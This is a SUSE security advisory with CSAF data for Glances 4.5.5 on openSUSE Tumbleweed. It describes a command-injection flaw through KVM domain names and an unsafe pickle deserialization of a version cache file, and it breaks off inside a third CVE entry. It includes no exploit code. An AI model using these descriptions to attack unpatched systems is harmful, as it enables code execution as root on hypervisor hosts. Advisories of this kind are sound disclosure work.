| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.4 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
17 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
